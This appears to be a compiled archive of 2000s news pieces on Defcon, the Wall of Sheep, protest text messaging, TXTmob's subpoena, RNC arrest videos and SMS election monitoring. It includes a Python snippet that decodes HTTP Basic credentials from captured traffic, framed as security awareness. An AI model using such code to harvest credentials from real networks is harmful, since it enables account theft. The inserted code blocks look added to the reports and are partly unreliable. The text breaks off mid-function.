One of the more controversial events at the conference was a “Race to Zero,” in which teams modified samples of viruses and tested them against antivirus software. Four teams managed to complete all the levels and get through the antivirus software. There were less technical contests as well. “Mike” from Chicago won $3,000 for spending 30 straight hours listening to pitches and marketing buzz from security company Configuresoft and correctly answering questions on periodic quizzes on the presentations. After the announcement, he jumped out of his seat with his arms in the air. Asked how he felt, Mike, who declined to give a last name, said he “felt smelly.” The contest, called “Buzzword Survivor,” was not without scandal. Several contestants claimed–and submitted a cell phone photo as evidence to organizers–that one of the contestants had fallen asleep at one point. However, he was allowed to remain in the contest and made it to the very end with all the others, winning $200. The second prize was $1,000.  Gartner analyst Paul Proctor came up with the idea on a whim. It was originally intended to have 10 contestants competing for 36 hours for a $10,000 prize, but the prize was reduced when only one sponsor stepped up. The contestants had 10 minute breaks every hour, but otherwise were in their seats listening to detailed talks about the company, its products, and the industry. “We’ve submitted them to pain,” Andrew Bird, a Configuresoft vice president who served as MC at the end of the contest, said mischievously. “We played recorded Webinars at 4 a.m.”

Defcon founder Jeff Moss aka “Dark Tangent” discusses ethics of hacking + disclosure issues that provoke debate, often lawsuits, at the event


One of the more popular gadgets from the previous two Defcons was the hackable convention badge. This year, we convinced Defcon’s founder Jeff Moss, aka Dark Tangent, and badge-designer Joe “Kingpin” Grand, to give an exclusive sneak preview of the Defcon 16 badge. Keep in mind that the badge in the photo is a prototype; the actual badges will be a different color, won’t have the USB and debug ports soldered on, nor include an SD card (so bring one, seriously).

Threat Level: Defcon 15’s badge was exponentially more complicated and functional than Defcon 14’s badge. How does this year’s badge compare to the DC 15 badge?
Joe Grand: Last year’s badge was sort of an over-engineered project. We wanted to do something that was cool and different than the year before, but it ended up getting more complicated because of design problems along the way … I was really aiming to have something a little less complicated and a little less over-engineered than Defcon 15, but still more complicated than Defcon 14 and have enough hackable features to make it interesting enough for people. It’s more simple than last year but also more powerful.

TL: Why did you choose a Freescale microprocessor, and why did you choose the MC9S08JM60 over the MC9S08QG8?
JG: The guys at Freescale have been super supportive throughout both the Defcon 15 and this Defcon 16 badge. One of their things is that they have a lot of engineers who truly love engineering and they love coming up with new products that use their technologies. They understand that it is a hacker gathering and the hackers are ultimately the ones who are creating the cutting-edge products and they’re messing around with technology and doing things that haven’t been done before. They love the concept and they love being involved with Defcon … The JM60 was a new product that they just launched … We looked at the processor and said the JM60 has support for USB so let’s use USB. It has support for a Secure Digital card so let’s add SD in there … I rarely come across companies that are as passionate as I am about a project and these guys are, so it’s a total thrill to be able to work with them.

TL: What components and other fun stuff does the badge have?
JG: The artistic elements and the PC board design tricks that I did this year [are] some of my favorite parts of doing the badge. Ping and Dark Tangent don’t necessarily understand the engineering constraints of making circuit boards so they really push me … In turn I get to learn a lot of new techniques … We’re doing stuff that’s totally crazy and nonstandard for circuit boards.

TL: Are they the same batteries as last year?
JG: No, different batteries. One of the things I ran into last year that I was pretty embarrassed about was the battery life. Depending on how much you used the badge, the batteries didn’t even last the weekend. For me one of my major design goals is making sure that the badge lasts longer than Defcon. This year I went with a larger battery, something that’s way more robust and will just last a long time for people who really want to hack on the badge. It’s one of the CR123A batteries. These things will last a long time, weeks if not months. It’s a little bigger than I would have liked, but I placed it in a way that hopefully will not get too annoying for people.

TL: Did you see the RFID badges at The Last HOPE?  Will yours also include some kind of unique ID for buddy/hacker tracking?
JG: I didn’t [see the HOPE badges] … We talked about the badges being able to either track each other or have some kind of unique identifier, but I think that shit is just way too big brother. Most people at Defcon don’t even use their real name. Forcing them to wear a badge that has features like that, to me is crap. I wouldn’t want to wear one of them.

TL: What were the biggest challenges in the badge development this time around?
JG: This badge … ended up taking 200 hours to design, versus the 170 from last year … Most of that was because I was trying new things I’d never done before … During the process, every time I had an engineering problem or I stayed up late … I just kept thinking the pain’s going to be worth it. Once the badge is done and it gets into people’s hands, and they just love the way it looks and they have fun with it and they hack on it, it makes all of the trouble worthwhile to get people interested in this type of thing.

TL: How are you going to top this badge next year?
JG: I have a few ideas for what I want to do next year assuming we do it … I won’t say what they are yet, but it’s going to be cool.

TL: What other projects are you working on right now?
JG: I just started a new apparel line called Kingpin Empire … I am going to donate a portion of the proceeds to hacker related charities and health related charities: EFF, ACLU, American Heart Association. Things that have personally affected me or personally saved me in some way. It’s a way for me to spread the hacker message to the masses … to educate people as to what hacking is about, support hacker and health related causes and give back to the community that shaped my entire life.

TL: Anything else you want to say about the badge?
JG: I just hope people like it. It’s a labor of love. The more people that hack on it the better. I want people to modify it, I want people to fix any problems they might see with it and just make it their own. If I can inspire just one person out of the 8,500 people that have a badge to start hacking on things and maybe even become an engineer, then I’ve done my part.

Displays Detail Who Has Sent Readable Data Using Insecure Wireless Connections
by Robert McMillan  /  August 11, 2008

The Wall of Sheep has become a fixture of the Defcon hacker conference: a wall with a long list of details showing who at the conference has sent readable data using insecure wireless connections. For Brian Markus, better known to conference attendees as “Riverside,” it just may become a line of business.

Last month, Markus and three of his fellow volunteers incorporated a company called Aries Security, which they bill as an education and security awareness consultancy that can come in and identify risky behavior on corporate networks. The company is still in an experimental state, meaning that none of the partners have actually quit their day jobs, Markus said. They don’t expect companies to start projecting their own Wall of Sheep displays in their lobbies, but they say the network analysis tools they’ve developed could be helpful when aimed at corporate networks. “We can go into a company if they need help with a security awareness program,” Markus said. “There are an amazing amount of things that we could see by watching the traffic go by.”

Wall of Sheep got its start in 2002, when Markus and friends were sniffing wireless LAN traffic at Defcon. It turned out there were plenty of people putting their data out on those networks. “We were saying there are so many of them, they are everywhere.” Inspired by a T-shirt, they decided to call the people they could observe “sheep,” and they started sticking paper plates on the wall with some of the user details they’d found. They list login names, domain or Internet Protocol addresses and partial passwords. Hotel management wasn’t crazy about the idea of paper plates being stuck to the walls, so the Wall of Sheep was soon using a projector.

They’ve seen some pretty crazy stuff revealed on open wireless LANs over the years, including fake usernames and passwords, brand-new computer attacks, a tax return and what Markus calls “nontypical adult material.” Today the project attracts dozens of volunteers at the conference who spend hours hunched over computers analyzing data before it’s put up on the wall. “It’s a tremendous amount of human labor,” Markus said. Wall of Sheep made its first appearance ever at Defcon’s less chaotic sister conference Black Hat this year, and it got a lot of attention when French journalists tried to post sensitive information on the wall that was culled from a Black Hat network set up for reporters. Because the journalists had illegally sniffed the Black Hat network without permission, Markus refused, and eventually the journalists were ejected from the conference. “We said, ‘No way,'” he said. “It’s completely against what all of us are trying to do.”

About the Wall of Sheep

Our mission is to raise security awareness. Computer crime and identity theft loom large in most people’s unconscious fears because they do not know:
1. How they are at risk, and
2. The steps they can take to protect themselves.

We explain both, but the way we do it is unconventional . . .

What We Do
The Wall of Sheep is an interactive demonstration of what can happen when network users let their guard down. We passively observe the traffic on a network, looking for evidence of users logging into email, web sites, or other network services without the protection of encryption. Those we find get put on the Wall of Sheep as a good-natured reminder that a malicious person could do the same thing we did . . . with far less friendly consequences. More importantly, we strive to educate the “sheep” we catch—and anyone who wants to learn— how to use free, easy-to-use tools to prevent leaks in the future.

Some Background
Nearly every time a network is accessed, an email account is checked, a web application is logged into, or a message is sent, some form of identification is passed between systems. By simply listening to this network traffic and sorting out the interesting bits, ill-intentioned third parties can often steal a password or other credentials with little to no effort. In reality, such eavesdroppers are infrequent on the average network, but that does not diminish the consequences when they are listening. Why take the risk when you don’t have to? Awareness and education are the key. The tools and knowledge to protect yourself are freely available. Most of the time, they are built into your current system.
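To make the point concrete: credentials sent with HTTP Basic authentication over an unencrypted connection are only base64-encoded, not encrypted, so an eavesdropper who captures the request can recover them trivially. Below is a minimal sketch of that decoding step; the captured request, hostname, and credentials are invented for illustration.

```python
import base64

# An invented example of a captured, unencrypted HTTP request.
# Basic auth credentials are base64-encoded, which is trivially reversible.
captured_request = (
    "GET /inbox HTTP/1.1\r\n"
    "Host: mail.example.com\r\n"
    "Authorization: Basic YWxpY2U6aHVudGVyMg==\r\n"
    "\r\n"
)

def extract_basic_credentials(request):
    """Return 'user:password' if the request carries HTTP Basic auth, else None."""
    for line in request.split("\r\n"):
        if line.lower().startswith("authorization: basic "):
            token = line.split(" ", 2)[2]
            return base64.b64decode(token).decode()
    return None

print(extract_basic_credentials(captured_request))  # alice:hunter2
```

The same observation applies to any protocol that sends credentials in the clear; the fix the Wall of Sheep volunteers teach is simply to use encrypted alternatives (HTTPS, SSH, and the like).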

Our Approach
The Wall of Sheep shows what happens when there are eavesdroppers on your network. If you access a network we are listening to without protecting yourself, we will see your username and password. Then we will post identifying elements* of your transaction on the Wall in front of all of your friends and colleagues. At that point, we hope you will come to us and learn how to avoid such mistakes in the future.

The Bottom Line
A potential attacker might maliciously and criminally use your mistakes against you. We do the opposite by raising security awareness and providing education on how to be defensive. It is very easy to become a “sheep,” but it is just as easy to learn how to avoid turning into one.

*but never the whole thing

From the archive, originally posted by: [ spectre ]





Aug 4, 2008 3:27 PM

if anyone has information, ANY INFORMATION!
please, please, PLEASE as soon as possible contact
Eric Fischer at:
cell phone: +1 646 932 1907


all equipment was in a rented penske 15 foot yellow truck
with u.s. (michigan) license plate number AC46493
parked immediately outside the hotel, the theft had
to have happened in the morning, between 6:30 and
7:30 am – truck and all gear stolen

pictures of some of the stolen stuff

Item      Country of Origin   Serial Number

Red roadcase containing:
Red Gibson 1963 EB-3 bass (this is Mike Watt’s bass!)   USA   No serial number

Black roadcase containing:
Reverend Flying V guitar – Volcano black   USA   #08001

Black roadcase containing:
Reverend Orange guitar   USA   03416 ZSL7

Black fibre case containing:
Gibson red SG short scale bass   USA   No serial number

Black roadcase containing:
Marshall Vintage/Modern Amplifier   UK   M-2007-07-0926-2 RoHS

Black roadcase containing:
Marshall Vintage/Modern Amplifier   UK   M-2007-07-0927-2 RoHS

4x Marshall 4×12 Cabinets (with Tuki cover)      UK   #1 Slant:  M-2007-05-0149-0

4x Marshall 4×12 Cabinets (with Tuki cover)      UK   #2 Straight:  M-2006-49-0380-0

4x Marshall 4×12 Cabinets (with Tuki cover)      UK   #3 Slant:  M-2007-05-0150-0

4x Marshall 4×12 Cabinets (with Tuki cover)      UK   #4 Straight:  M-2006-49-0381-0

Orange Calzone road case containing:
Guitar pedal board and pedals   USA/Japan   No serial number
Assorted leads    USA/UK   No serial number
2x mic stands   Germany   No serial number
Assorted strings and spares   USA   No serial number
2x Boss TU2 Chromatic Tuner
Boss CH1 Super Chorus
Fulltone OCD Overdrive
Crybaby Wah
Peterson Strobo-Stomp Tuner Pedal
Whirlwind A/B Boxes
Whirlwind Cable Tester
and many, many instrument cables
various tools ( screwdrivers, soldering iron, pliers, etc… )
tambourine and maracas

Cardboard box containing:
Assorted replacement drum heads   USA   No serial number

Gretsch Silver Sparkle Catalina drum kit      USA   No serial number
26″ Kick Drum      No serial number
13″ Rack Tom      No serial number
18″ Floor Tom      No serial number
4x Cymbal Stands      No serial number
1x Snare Stand      No serial number
1x Hi Hat Stand      No serial number
1x Drum Throne      No serial number

Eden D810 Bass cabinet      USA   D810RP4 0703E5001

Eden D810 Bass cabinet      USA   D810RP4 0703E5002

Cardboard box containing:
Eden VT300 Bass amplifier   USA   0601E5115

Cardboard box containing:
Eden VT300 Bass amplifier   USA   0507E5033

Floor Fan      CHINA   No serial number

Floor Fan      CHINA   No serial number

Green clamshell suitcase containing:
Yamaha snare drum   JAPAN   No serial number
Yamaha kick pedal   JAPAN   No serial number
Zildjian Mega Bell cymbal   USA   No serial number
Zildjian 15″ Hi-Hats   USA   No serial number
3x Zildjian 18″ 19″ 20″ crash medium cymbals   USA   No serial number

Brown Epiphone guitar case:
Black Epiphone EB3 short scale bass   KOREA   F300503

1 x Wheeled Black Pelican case (50cm x 28cm x 20cm) containing :
A selection of microphones and microphone accessories, most of which
are in separately labeled black pouches. All of the microphones are of
Shure manufacture, also a BSS DI box. Inside the Pelican case there is
also a Ferrari pencil case containing an iPod, iPod accessories,
various small cables and adaptors, a Leatherman Charge, a Stooges AAA
tour laminate, some pain killers, some sharpies, some electrical tape,
some business cards (Mr Rik Hart). Within the case there is also a big
pair of Sony headphones (model MDR7506) with a long curly cable and
three very long XLR to XLR mic cables. Here’s a more specific list of
the microphones :
2 x SM91
5 x SM98
2 x B98
2 x SM81
2 x KSM32
1 x KSM27
2 x B52
3 x SM57
8 x SM58
1 x BSS AR-133 DI Box
(all manufactured by shure)


RE: posted by [ rsolomon ]

nothing sadder than an empty van


NY City Subpoenas Creator of Text Messaging Code
BY Colin Moynihan  /  March 30, 2008

When delegates to the Republican National Convention assembled in New
York in August 2004, the streets and sidewalks near Union Square and
Madison Square Garden filled with demonstrators. Police officers in
helmets formed barriers by stretching orange netting across
intersections. Hordes of bicyclists participated in rolling protests
through nighttime streets, and helicopters hovered overhead.

These tableaus and others were described as they happened in text
messages that spread from mobile phone to mobile phone in New York
City and beyond. The people sending and receiving the messages were
using technology, developed by an anonymous group of artists and
activists called the Institute for Applied Autonomy, that allowed
users to form networks and transmit messages to hundreds or thousands
of telephones.

Although the service, called TXTmob, was widely used by demonstrators,
reporters and possibly even police officers, little was known about
its inventors. Last month, however, the New York City Law Department
issued a subpoena to Tad Hirsch, a doctoral candidate at the
Massachusetts Institute of Technology who wrote the code that created

Lawyers representing the city in lawsuits filed by hundreds of people
arrested during the convention asked Mr. Hirsch to hand over
voluminous records revealing the content of messages exchanged on his
service and identifying people who sent and received messages. Mr.
Hirsch says that some of the subpoenaed material no longer exists and
that he believes he has the right to keep other information secret.
“There’s a principle at stake here,” he said recently by telephone. “I
think I have a moral responsibility to the people who use my service
to protect their privacy.”

The subpoena, which was issued Feb. 4, instructed Mr. Hirsch, who is
completing his dissertation at M.I.T., to produce a wide range of
material, including all text messages sent via TXTmob during the
convention, the date and time of the messages, information about
people who sent and received messages, and lists of people who used
the service.

In a letter to the Law Department, David B. Rankin, a lawyer for Mr.
Hirsch, called the subpoena “vague” and “overbroad,” and wrote that
seeking information about TXTmob users who have nothing to do with
lawsuits against the city would violate their First Amendment and
privacy rights.

Lawyers for the city declined to comment. The subpoena is connected to
a group of 62 lawsuits against the city that stem from arrests during
the convention and have been consolidated in Federal District Court in
Manhattan. About 1,800 people were arrested and charged, but 90
percent of them ultimately walked away from court without pleading
guilty or being convicted. Many people complained that they were
arrested unjustly, and a State Supreme Court justice chastised the
city after hundreds of people were held by the police for more than 24
hours without a hearing.

The police commissioner, Raymond W. Kelly, has called the convention a
success for his department, which he credited with preventing major
disruptions during a turbulent week. He has countered complaints about
police tactics by saying that nearly a million people peacefully
expressed their political opinions, while the convention and the city
functioned smoothly. Mr. Hirsch said that the idea for TXTmob evolved
from conversations about how police departments were adopting
strategies to counter large-scale marches that converged at a single location.

While preparing for the 2004 political conventions in New York and
Boston, some demonstrators decided to plan decentralized protests in
which small, mobile groups held rallies and roamed the streets. “The
idea was to create a very dynamic, fluid environment,” Mr. Hirsch
said. “We wanted to transform areas around the entire city into
theaters of dissent.”

Organizers wanted to enable people in different areas to spread word
of what they were seeing in each spot and to coordinate their
movements. Mr. Hirsch said that he wrote the TXTmob code over about
two weeks. After a trial run in Boston during the Democratic National
Convention, the service was in wide use during the Republican
convention in New York. Hundreds of people went to the TXTmob Web site
and joined user groups at no charge.

As a result, when members of the War Resisters League were arrested
after starting to march up Broadway, or when Republican delegates
attended a performance of “The Lion King” on West 42nd Street, a
server under a desk in Cambridge, Mass., transmitted messages
detailing the action, often while scenes on the streets were still unfolding.

Messages were exchanged by self-organized first-aid volunteers,
demonstrators urging each other on and even by people in far-flung
cities who simply wanted to trade thoughts or opinions with those on
the streets of New York. Reporters began monitoring the messages too,
looking for word of breaking news and rushing to spots where mass
arrests were said to be taking place. And Mr. Hirsch said he thought
it likely that police officers were among those receiving TXTmob
messages on their phones.

It is difficult to know for sure who received messages, but an
examination of police surveillance documents prepared in 2003 and
2004, and unsealed by a federal magistrate last year, makes it clear
that the authorities were aware of TXTmob at least a month before the
Republican convention began.

A document marked “N.Y.P.D. SECRET” and dated July 26, 2004, included
the address of the TXTmob Web site and stated, “It is anticipated that
text messaging is one of several different communications systems that
will be utilized to organize the upcoming RNC protests.”


Tad Hirsch
email : tad [at] media [dot] mit [dot] edu

John Henry
Institute for Applied Autonomy
email : iaa [at] appliedautonomy [dot] com


TXTmob: Text Messaging For Protest Swarms
BY Tad Hirsch and John Henry

Abstract: “This paper describes cell phone text messaging during the
2004 US Democratic and Republican National Conventions by protesters
using TXTmob – a text-message broadcast system developed by the
authors.  Drawing upon analysis of TXTmob messages, user interviews,
self-reporting, and news media accounts, we describe the ways that
activists used text messaging to share information and coordinate
actions during decentralized protests. We argue that text messaging
supports new forms of distributed participation in mass mobilizations.”




Competition to Offer Prizes and SMS Platform to Grassroots NGOs  /
Sep. 17, 2007
nGOmobile initiative highlights the benefits of mobile technology in
the developing world

CAMBRIDGE, England, Sept. 17 /PRNewswire/ — A mobile technology
organization has launched its latest non-profit mobile initiative,
nGOmobile, a competition to help grassroots NGOs take advantage of
text messaging.

The explosive entry of mobile technology into the developing world has
opened up a raft of opportunities for the non-profit sector. Text
messaging has proved itself to be remarkably versatile, helping remind
patients to take their medicine, providing market prices to farmers
and fishermen, distributing health information, allowing the reporting
of human rights abuses and promoting increased citizen participation
in government. While the list may be long, not everyone has been able
to reap the benefits.

nGOmobile is a competition aimed exclusively at grassroots non-profit
Non Governmental Organizations (NGOs) working for positive social and
environmental change throughout the developing world. “Behind the
scenes, the often unsung heroes of the NGO community battle against
the daily realities of life in developing countries, where it can take
all day to fulfill the simplest task,” said Ken Banks, the
initiative’s founder. “These people don’t lack passion and commitment,
they lack tools and resources,” said Banks.

Grassroots NGOs around the world are invited to submit short project
ideas explaining how greater access to mobile technology – and SMS
text messaging in particular – would benefit them and their work. The
competition is open from today until 14th December 2007 with the
winners announced in January 2008.

The top four entries, chosen by a distinguished panel of judges, will
each win a brand new Hewlett Packard laptop computer, two Nokia mobile
phones, a GSM modem, the organization’s own entry-level text messaging
platform – FrontlineSMS – and, to top it all, a cash prize of US$1,000.

Sponsors of the competition include Hewlett Packard, Nokia,
ActiveXperts, 160 Characters, Wieden+Kennedy, mBlox and Perkins Coie.

Panel of Judges:
Ken Banks, Founder
Neerja Raman, From Good to Gold
Mike Grenville, Editor, 160 Characters
Micheline Ntiru, Nokia’s Head of Corporate Social Investment for the Middle East and Africa
Bill Thompson, Journalist/commentator
Renny Gleeson, Global Director of Digital Strategies at Wieden+Kennedy

The competition website can be found at

Ken Banks, Founder
email : ken [dot] banks [at] ngomobile [dot] org

About the organization: Since 2003, the organization has been helping
local, national and international non-profit Non-Governmental
Organizations (NGOs) make better use of information and communications
technology in their work. Specializing in the application of mobile
technology, it provides a wide range of ICT-related services drawing
on the over 22 years’ experience of its Founder, Ken Banks. The
organization believes that all non-profits, whatever their size and
wherever they operate, should be given the opportunity to implement
the latest mobile technologies in their work, and actively seeks to
provide the tools to enable them to do so.





BY Jeffrey Kosseff   /  March 25, 2003

At first glance, it looks like a 9-1-1 log or a transcript from the
police scanner:

05:37pm Protesters damage cars on Second and Davis.
05:38pm March spreading north into Oldtown.
05:43pm Morrison Bridge closed again.

But the communications Thursday during antiwar protests in downtown
Portland weren’t from the police. Instead, they were part of 126 text
messages sent out to 65 protesters’ cell phones, pagers and e-mail accounts.

Protesters say they have long searched for an efficient and quick way
of sharing news of bridge shutdowns, flag burnings and pepper
spraying. And they seem to have found it in a relatively young
wireless technology that is reliable, cheap and instantaneous, sending
short bursts of text onto many cell-phone screens at once.

“It definitely helped spread the news around,” said Michael Plump, a
24-year-old computer programmer who organized a text-messaging system
to improve communication among protesters.

Spreading news of developments takes too long with cell-phone calls
because organizers can reach only one person at a time. Walkie-talkies
aren’t reliable or secure enough. And most people don’t have laptops
with wireless e-mail access.

Plump said that since police pepper-sprayed him at a protest during
President Bush’s Aug. 23 visit to Portland, he has wanted to get more
involved with peace protests. “I wanted to help people know where the
police actions were occurring and where they were pepper spraying so
they could get away from it,” Plump said.

Web of reports

So he developed a Web-based program that allows protesters to enter
their cell phone or pager numbers or e-mail addresses into an online
database, which he promoted on Portland activist Web sites. Most
people received the alerts on cell phones or pagers, though a few
received e-mails.
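The kind of system described here, a subscriber database plus a dispatcher that fans one short update out to every registered address, can be sketched in a few lines. This is an illustrative reconstruction, not Plump’s actual code; the class name, the sample addresses, and the stubbed delivery function are all invented.

```python
# Illustrative sketch of a protest alert broadcast list (invented names).
# Delivery is stubbed out; a real system would hand each address to an
# SMS gateway, pager service, or mail server.
class BroadcastList:
    def __init__(self, send):
        self.subscribers = []   # cell, pager, or e-mail addresses
        self.send = send        # delivery function, injected for testing

    def register(self, address):
        # each address is stored once, no matter how often it signs up
        if address not in self.subscribers:
            self.subscribers.append(address)

    def broadcast(self, update):
        # one short burst of text goes to every registered address
        for address in self.subscribers:
            self.send(address, update)
        return len(self.subscribers)

alerts = BroadcastList(send=lambda addr, msg: None)  # stubbed delivery
alerts.register("+1-503-555-0100")                   # invented number
alerts.register("")        # invented address
alerts.broadcast("05:43pm Morrison Bridge closed again.")
```

The design mirrors the trade-off the article describes: a phone call reaches one person at a time, while a single loop over the database reaches everyone at once.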

From 4 p.m. to midnight Thursday, about 15 protesters throughout
downtown Portland phoned or sent e-mail and text messages to Plump’s
friend, Casey Spain. Spain summarized developments into a few words
and sent them on to the 65 cell-phone numbers in the database. Plump,
who was in downtown Portland throughout the protests, said cheers
erupted whenever Spain sent news of activists storming a bridge or

And even amid the chaos, the protesters found time for text-messaging humor:

08:27pm Rummor — police may be planning assult from under Burnside
08:28pm Someone plase scout under the bridge please!
08:31pm Police may be eating donuts under the bridge.

Cell-phone text messaging is gaining popularity. According to
Telephia, a California research firm, 24 percent of U.S. cell-phone
subscribers used text messaging in the first quarter of this year, up
from 20 percent the previous quarter.

Verizon service up

Verizon Wireless, which charges 10 cents to send and 2 cents to
receive each text message, has seen its news-alert service double
since January for headlines about the military and Federal Bureau of
Investigation. “A lot of people use text messaging now, and it has
been going up all the time,” said Georgia Taylor, a Verizon Wireless spokeswoman.

Wireless companies began offering text messaging in the United States
about two years ago, said Goli Ameri, president of eTinium, a Portland
telecommunications consulting firm. It is not yet as popular in the
United States as it is in Asia and Europe. Intel recently ranked
Portland the top city in the nation for the use of wireless
technology, so Ameri said she isn’t surprised that people here are
finding new uses for text messaging.

“Portland is a pretty tech-savvy city,” she said. “That’s why you see
so many of these new technologies get introduced here first.”

{email : jeffkosseff [at] news [dot] oregonian [dot] com}


Videos Challenge Accounts of Convention Unrest
BY Jim Dwyer  /  April 12, 2005  /  New York Times

Dennis Kyne put up such a fight at a political protest last summer,
the arresting officer recalled, it took four police officers to haul
him down the steps of the New York Public Library and across Fifth Avenue.

“We picked him up and we carried him while he squirmed and screamed,”
the officer, Matthew Wohl, testified in December. “I had one of his
legs because he was kicking and refusing to walk on his own.”

Accused of inciting a riot and resisting arrest, Mr. Kyne was the
first of the 1,806 people arrested in New York last summer during the
Republican National Convention to take his case to a jury. But one day
after Officer Wohl testified, and before the defense called a single
witness, the prosecutor abruptly dropped all charges.

During a recess, the defense had brought new information to the
prosecutor. A videotape shot by a documentary filmmaker showed Mr.
Kyne agitated but plainly walking under his own power down the library
steps, contradicting the vivid account of Officer Wohl, who was
nowhere to be seen in the pictures. Nor was the officer seen taking
part in the arrests of four other people at the library against whom
he signed complaints.

A sprawling body of visual evidence, made possible by inexpensive,
lightweight cameras in the hands of private citizens, volunteer
observers and the police themselves, has shifted the debate over
precisely what happened on the streets during the week of the convention.

For Mr. Kyne and 400 others arrested that week, video recordings
provided evidence that they had not committed a crime or that the
charges against them could not be proved, according to defense lawyers
and prosecutors.

Among them was Alexander Dunlop, who said he was arrested while going
to pick up sushi.

Last week, he discovered that there were two versions of the same
police tape: the one that was to be used as evidence in his trial had
been edited at two spots, removing images that showed Mr. Dunlop
behaving peacefully. When a volunteer film archivist found a more
complete version of the tape and gave it to Mr. Dunlop’s lawyer,
prosecutors immediately dropped the charges and said that a technician
had cut the material by mistake.

Seven months after the convention at Madison Square Garden, criminal
charges have fallen against all but a handful of people arrested that
week. Of the 1,670 cases that have run their full course, 91 percent
ended with the charges dismissed or with a verdict of not guilty after
trial. Many were dropped without any finding of wrongdoing, but also
without any serious inquiry into the circumstances of the arrests,
with the Manhattan district attorney’s office agreeing that the cases
should be “adjourned in contemplation of dismissal.”

So far, 162 defendants have either pleaded guilty or were convicted
after trial, and videotapes that bolstered the prosecution’s case
played a role in at least some of those cases, although prosecutors
could not provide details.

Besides offering little support or actually undercutting the
prosecution of most of the people arrested, the videotapes also
highlight another substantial piece of the historical record: the
Police Department’s tactics in controlling the demonstrations, parades
and rallies of hundreds of thousands of people were largely free of
explicit violence.

Throughout the convention week and afterward, Mayor Michael R.
Bloomberg said that the police issued clear warnings about blocking
streets or sidewalks, and that officers moved to arrest only those who
defied them. In the view of many activists – and of many people who
maintain that they were passers-by and were swept into dragnets
indiscriminately thrown over large groups – the police strategy
appeared to be designed to sweep them off the streets on technical
grounds as a show of force.

“The police develop a narrative, the defendant has a different story,
and the question becomes, how do you resolve it?” said Eileen Clancy,
a member of I-Witness Video, a project that assembled hundreds of
videotapes shot during the convention by volunteers for use by defense lawyers.

Paul J. Browne, a police spokesman, said that videotapes often do not
show the full sequence of events, and that the public should not rush
to criticize officers simply because their recollections of events are
not consistent with a single videotape. The Manhattan district
attorney’s office is reviewing the testimony of Officer Wohl at the
request of Lewis B. Oliver Jr., the lawyer who represented Mr. Kyne in
his arrest at the library.

The Police Department maintains that much of the videotape that has
surfaced since the convention captured what Mr. Browne called the
department’s professional handling of the protests and parades. “My
guess is that people who saw the police restraint admired it,” he said.

Video is a useful source of evidence, but not an easy one to manage,
because of the difficulties in finding a fleeting image in hundreds of
hours of tape. Moreover, many of the tapes lack index and time
markings, so cuts in the tape are not immediately apparent.

That was a problem in the case of Mr. Dunlop, who learned that his
tape had been altered only after Ms. Clancy found another version of
the same tape. Mr. Dunlop had been accused of pushing his bicycle into
a line of police officers on the Lower East Side and of resisting
arrest, but the deleted parts of the tape show him calmly approaching
the police line, and later submitting to arrest without apparent incident.

A spokeswoman for the district attorney, Barbara Thompson, said the
material had been cut by a technician in the prosecutor’s office. “It
was our mistake,” she said. “The assistant district attorney wanted to
include that portion” because she initially believed that it supported
the charges against Mr. Dunlop. Later, however, the arresting officer,
who does not appear on the video, was no longer sure of the specifics
in the complaint against Mr. Dunlop.

In what appeared to be the most violent incident at the convention
protests, video shot by news reporters captured the beating of a man
on a motorcycle – a police officer in plainclothes – and led to the
arrest of one of those involved, Jamal Holiday. After eight months in
jail, he pleaded guilty last month to attempted assault, a low-level
felony that will be further reduced if he completes probation. His
lawyer, Elsie Chandler of the Neighborhood Defender Service of Harlem,
said that videos had led to his arrest, but also provided support for
his claim that he did not realize the man on the motorcycle was a
police officer, reducing the severity of the offense.

Mr. Browne, the police spokesman, said that despite many civilians
with cameras who were nearby when the officer was attacked, none of
the material was turned over to police trying to identify the
assailants. Footage from a freelance journalist led police to Mr.
Holiday, he said.

The bulk of the 400 cases that were dismissed based on videotapes
involved arrests at three places – 16th Street near Union Square,
17th Street near Union Square and on Fulton Street – where police
officers and civilians taped the gatherings, said Martin R. Stolar,
the president of the New York City chapter of the National Lawyers
Guild. Those tapes showed that the demonstrators had followed the
instructions of senior officers to walk down those streets, only to
have another official order their arrests.

Ms. Thompson of the district attorney’s office said, “We looked at
videos from a variety of sources, and in a number of cases, we have
moved to dismiss.”


Texting It In: Monitoring Elections With Mobile Phones
BY Katrin Verclas  /  August 11, 2007

In Sierra Leone’s national election today, 500 election observers at
polling stations around the country are reporting on any
irregularities via SMS with their mobile phones. Independent
monitoring of elections via cell phone is growing around the world,
spearheaded by a few innovative NGOs.

The story starts in Montenegro, a small country in the former
Yugoslavia. On May 21, 2006 the country saw the first instance of
volunteer monitors using SMS, also known as text messaging, as their
main election reporting tool. A Montenegrin NGO, the Center for
Democratic Transition (CDT), with technical assistance from the
National Democratic Institute (NDI) in the United States, was the
first organization in the world to use text messaging to meet all
election day reporting requirements.

Since then, mobile phones have been deployed in six elections in
countries around the world, with volunteers systematically using text
messaging in election monitoring. Pioneered by NDI, SMS monitoring is
becoming a highly sophisticated rapid reporting tool used not just in
a referendum election like in Montenegro, but in parliamentary
elections with a plethora of candidates and parties and complex data
reported via SMS. This was the case in Bahrain, a small country in the
Middle East, where monitors reported individual election tallies in a
series of five to forty concurrent SMS messages, using a
sophisticated coding system, with near-perfect accuracy.

Today’s election in Sierra Leone is led by the National Election
Watch (NEW), a coalition of over 200 NGOs in the country. Assisted by
NDI, NEW has monitors at 500 of the 6171 polling stations. Monitors
report on whether there are any irregularities via SMS back to
headquarters. This election is particularly significant for the
country: It is the first presidential election since U.N. peacekeepers
withdrew two years ago. It is considered a historic poll that many hope
will show that the country can transfer power peacefully after a long
civil war and military coups. In the run-up to the election there was
sporadic violence in Freetown, making the independent monitoring by
NGOs particularly relevant and necessary.

Election monitoring is a highly technical discipline, with a
sophisticated set of methodologies and extensive volunteer training.
Preparation for an election monitoring exercise involves volunteer
training and advance planning that often starts months before an
election.  Election monitors, typically led by domestic non-
governmental organizations (NGOs) often with the help of foreign
technical assistance providers like NDI, can report on multiple
dimensions.  They may, depending on the election, report on
quantitative data such as real-time voter turnout and even on actual
election results. In those cases, monitors use the data to provide a
“quick count” projection of the election results.  If a “quick count”
is conducted then a statistical random sample of polling places is
carefully selected to ensure the validity of projections.
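The arithmetic behind such a “quick count” is simple once the random sample is in hand: sum the sampled tallies and take each candidate’s share. A minimal sketch, with invented station tallies and field names purely for illustration:

```python
# Hypothetical "quick count": project national vote shares from a
# random sample of polling-station tallies. All numbers are invented.
sample = [
    {"station": "A", "candidate_x": 310, "candidate_y": 250},
    {"station": "B", "candidate_x": 120, "candidate_y": 180},
    {"station": "C", "candidate_x": 400, "candidate_y": 390},
]

def project_share(stations, candidate):
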